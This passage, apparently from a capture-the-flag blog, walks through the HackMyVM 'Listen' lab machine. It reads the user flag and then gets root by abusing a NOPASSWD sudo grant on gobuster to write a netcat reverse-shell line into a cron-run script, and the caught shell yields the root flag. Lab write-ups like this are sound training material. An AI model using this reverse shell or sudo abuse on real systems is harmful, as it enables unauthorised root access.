Warning: Permanently added '192.168.60.146' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux listen 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 7 08:25:40 2025 from 192.168.31.34
$ bash
welcome@listen:~$

The rest of the process is basically the same as Listen:

HackMyVM Listen machine detailed walkthrough (WP) | Pepster's Blog

But let's go through it once more anyway.

Got the user flag.

welcome@listen:~$ cat user.txt
29e0f786e8c90b3ce82e00de0ec7e7d3

Root privilege escalation

The user has sudo rights.

welcome@listen:~$ sudo -l
Matching Defaults entries for welcome on listen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
(ALL) NOPASSWD: /usr/bin/gobuster
welcome@listen:~$ sudo /usr/bin/gobuster -w /root/root.txt -u http://192.168.60.100:8000
2025/01/09 04:48:44 [!] 1 error occurred:
* Wordlist (-w): File does not exist: /root/root.txt

But it isn't that simple: to get the root flag you need a root shell.

The flag's file name has been changed.

Since we already know there is a cron job, I won't explain it again.

welcome@listen:~$ cd /tmp
welcome@listen:/tmp$ echo 'nc -c sh 192.168.60.100 4444'>exp
welcome@listen:/tmp$ chmod +x exp
welcome@listen:/tmp$ echo 'tmp/exp'>dir.txt
welcome@listen:/tmp$ sudo /usr/bin/gobuster -w dir.txt -u http://192.168.60.100:8000 -q -n -o /opt/.test.sh
/tmp/exp
-----------separator--------------------------
mkdir -p tmp/exp
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
❯ pwncat-cs -lp 4444
[17:54:36] Welcome to pwncat 🐈! __main__.py:164
[17:55:01] received connection from 192.168.60.146:50450 bind.py:84
[17:55:01] 0.0.0.0:4444: normalizing shell path manager.py:957
0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[17:55:02] 192.168.60.146:50450: registered new host w/ db manager.py:957
(local) pwncat$
(remote) root@listen:/root# ls
note.txt R00t_fl4g_is_HHHHerererererrererere.txt
(remote) root@listen:/root# cat R00t_fl4g_is_HHHHerererererrererere.txt
b6a1a0de4223ba038327fc9c647701fb

🥳
